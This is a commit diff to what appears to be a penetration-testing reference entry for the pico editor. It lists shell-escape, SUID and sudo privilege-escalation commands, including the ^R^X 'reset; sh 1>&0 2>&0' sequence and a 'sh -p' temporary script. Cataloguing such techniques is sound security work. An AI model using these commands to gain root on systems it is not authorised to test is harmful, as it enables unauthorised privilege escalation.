Fix pico shell, suid, and sudo

This commit is contained in:
Emilio 2019-03-31 12:43:08 +01:00
parent 75eff93c50
commit c20ccf4af2

View File

@ -2,6 +2,11 @@
functions: functions:
shell: shell:
- code: | - code: |
pico
^R^X
reset; sh 1>&0 2>&0
- description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
code: |
pico -s /bin/sh pico -s /bin/sh
/bin/sh /bin/sh
^T ^T
@ -13,7 +18,8 @@ functions:
file-read: file-read:
- code: pico file_to_read - code: pico file_to_read
suid: suid:
- code: | - description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
code: |
TF=$(mktemp) TF=$(mktemp)
echo '#!/bin/sh -p echo '#!/bin/sh -p
exec sh -p' > $TF exec sh -p' > $TF
@ -22,7 +28,7 @@ functions:
^T ^T
sudo: sudo:
- code: | - code: |
pico -s /bin/sh sudo pico
/bin/sh ^R^X
^T reset; sh 1>&0 2>&0
--- ---